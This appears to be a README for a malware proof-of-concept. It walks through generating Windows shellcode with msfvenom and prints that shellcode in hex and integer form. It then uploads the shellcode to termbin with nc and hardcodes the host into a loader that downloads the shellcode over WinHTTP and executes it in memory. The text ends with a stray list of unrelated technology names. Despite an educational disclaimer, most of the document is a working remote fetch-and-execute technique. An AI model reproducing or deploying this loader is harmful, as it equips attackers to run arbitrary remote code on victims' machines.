Disclaimer: This repository is for educational purposes only. The author is not responsible for any misuse of the information contained herein.
This repository is a proof of concept of a malware development that retrieves shellcode from a remote server and executes it in memory.
Create your shellcode using msfvenom and save it in a file.
msfvenom --platform windows --arch x64 -p windows/x64/exec CMD=calc.exe -b '\x00\x0A\x0D' -f hexAfter generating the shellcode in hex format, we need to convert it into integer format. (You can use CyberChef to convert it).
Here is an example of the shellcode generated by msfvenom:
"\xeb\x27\x5b\x53\x5f\xb0\x98\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\x61\xde\x74\x07\x80\x3e\x98\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x10\x98\xec\x58\x93\xf4\xe0\xf8\xd0\x10"
"\x10\x10\x51\x41\x51\x40\x42\x41\x46\x58\x21\xc2\x75\x58"
"\x9b\x42\x70\x58\x9b\x42\x08\x58\x9b\x42\x30\x58\x9b\x62"
"\x40\x58\x1f\xa7\x5a\x5a\x5d\x21\xd9\x58\x21\xd0\xbc\x2c"
"\x71\x6c\x12\x3c\x30\x51\xd1\xd9\x1d\x51\x11\xd1\xf2\xfd"
"\x42\x51\x41\x58\x9b\x42\x30\x9b\x52\x2c\x58\x11\xc0\x9b"
"\x90\x98\x10\x10\x10\x58\x95\xd0\x64\x77\x58\x11\xc0\x40"
"\x9b\x58\x08\x54\x9b\x50\x30\x59\x11\xc0\xf3\x46\x58\xef"
"\xd9\x51\x9b\x24\x98\x58\x11\xc6\x5d\x21\xd9\x58\x21\xd0"
"\xbc\x51\xd1\xd9\x1d\x51\x11\xd1\x28\xf0\x65\xe1\x5c\x13"
"\x5c\x34\x18\x55\x29\xc1\x65\xc8\x48\x54\x9b\x50\x34\x59"
"\x11\xc0\x76\x51\x9b\x1c\x58\x54\x9b\x50\x0c\x59\x11\xc0"
"\x51\x9b\x14\x98\x58\x11\xc0\x51\x48\x51\x48\x4e\x49\x4a"
"\x51\x48\x51\x49\x51\x4a\x58\x93\xfc\x30\x51\x42\xef\xf0"
"\x48\x51\x49\x4a\x58\x9b\x02\xf9\x47\xef\xef\xef\x4d\x58"
"\xaa\x11\x10\x10\x10\x10\x10\x10\x10\x58\x9d\x9d\x11\x11"
"\x10\x10\x51\xaa\x21\x9b\x7f\x97\xef\xc5\xab\xe0\xa5\xb2"
"\x46\x51\xaa\xb6\x85\xad\x8d\xef\xc5\x58\x93\xd4\x38\x2c"
"\x16\x6c\x1a\x90\xeb\xf0\x65\x15\xab\x57\x03\x62\x7f\x7a"
"\x10\x49\x51\x99\xca\xef\xc5\x73\x71\x7c\x73\x3e\x75\x68"
"\x75\x10\x61\xde";And here is the shellcode converted to integer format:
235 39 91 83 95 176 152 252 174 117 253 87 89 83 94 138 6 48 7 72 255 199 72 255 198 102 129 63 97 222 116 7 128 62 152 117 234 235 230 255 225 232 212 255 255 255 16 152 236 88 147 244 224 248 208 16 16 16 81 65 81 64 66 65 70 88 33 194 117 88 155 66 112 88 155 66 8 88 155 66 48 88 155 98 64 88 31 167 90 90 93 33 217 88 33 208 188 44 113 108 18 60 48 81 209 217 29 81 17 209 242 253 66 81 65 88 155 66 48 155 82 44 88 17 192 155 144 152 16 16 16 88 149 208 100 119 88 17 192 64 155 88 8 84 155 80 48 89 17 192 243 70 88 239 217 81 155 36 152 88 17 198 93 33 217 88 33 208 188 81 209 217 29 81 17 209 40 240 101 225 92 19 92 52 24 85 41 193 101 200 72 84 155 80 52 89 17 192 118 81 155 28 88 84 155 80 12 89 17 192 81 155 20 152 88 17 192 81 72 81 72 78 73 74 81 72 81 73 81 74 88 147 252 48 81 66 239 240 72 81 73 74 88 155 2 249 71 239 239 239 77 88 170 17 16 16 16 16 16 16 16 88 157 157 17 17 16 16 81 170 33 155 127 151 239 197 171 224 165 178 70 81 170 182 133 173 141 239 197 88 147 212 56 44 22 108 26 144 235 240 101 21 171 87 3 98 127 122 16 73 81 153 202 239 197 115 113 124 115 62 117 104 117 16 97 222Next step is to upload our shellcode to a remote pastebin service. In this case we are using termbin (you can use any other service).
cat shellcode.txt | nc termbin.com 9999Copy the link and paste it in the main.c file.
#define HOST L"termbin.com"
#define PATH L"/d30q"Compile the project and execute it.
The program will use the winhttp module from the Windows API to make a GET request to the remote server. The response will be the shellcode that will be copied to a buffer and executed in memory.
mkdir build
cd build
cmake .. -G "MinGW Makefiles"
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent